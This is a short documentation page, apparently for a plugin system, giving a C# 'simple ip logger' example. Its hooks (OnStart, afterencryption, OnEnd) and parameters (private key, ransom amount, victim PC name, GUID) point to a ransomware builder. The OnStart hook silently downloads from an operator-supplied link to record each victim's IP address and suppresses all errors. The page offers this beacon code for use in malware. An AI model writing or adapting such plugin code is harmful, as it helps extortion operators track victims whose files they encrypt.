> For the complete documentation index, see [llms.txt](https://hntarnsmwre.gitbook.io/hnta-plugins/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hntarnsmwre.gitbook.io/hnta-plugins/examples/simple-ip-log.md).

# Simple ip log

simple ip logger&#x20;

```
        public static void OnStart(string publickey, string privatekey, string worker, string amount, string password, string pcname, string usr, string pc_user, string guid)
        {
            try
            {
            using (var wc = new System.Net.WebClient())
            {
                string contents;
                contents = wc.DownloadString("your link");
            }
            }
            catch 
            {
                
            }
        }

        public static void afterencryption(string publickey, string privatekey, string worker, string amount, string password, string pcname, string usr, string pc_user, string guid)
        {
            try
            {

            }
            catch
            {

            }
        }

        public static void OnEnd(string publickey, string privatekey, string worker, string amount, string password, string pcname, string usr, string pc_user, string guid)
        {
            try
            {

            }
            catch
            {

            }
        }
```
